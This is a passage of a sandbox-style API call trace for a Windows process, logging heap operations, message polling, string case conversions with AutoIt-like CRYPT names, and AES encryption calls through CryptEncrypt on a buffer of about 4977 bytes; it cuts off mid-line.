[0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0040.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0040.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0040.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0040.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0040.902] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0040.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.902] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.902] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0040.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0040.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0040.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0040.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0040.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0040.906] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3a8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3a8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0040.906] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.906] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.906] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0040.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.906] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.906] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.906] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.906] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.906] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.907] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.907] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.907] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0040.907] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.907] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0040.907] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.907] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1369, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x1370) returned 1 [0040.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.907] CharLowerBuffW (in: lpsz="byte[4977]", cchLength=0xa | out: lpsz="byte[4977]") returned 0xa [0040.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.908] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.908] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.908] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.908] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xac4708*, pdwDataLen=0x6ae220*=0x1369, dwBufLen=0x1370 | out: pbData=0xac4708*, pdwDataLen=0x6ae220*=0x1370) returned 1 [0040.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.908] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0040.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.908] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.908] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.909] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.909] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.909] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.909] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.909] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.909] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.909] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.909] PeekMessageW (in: 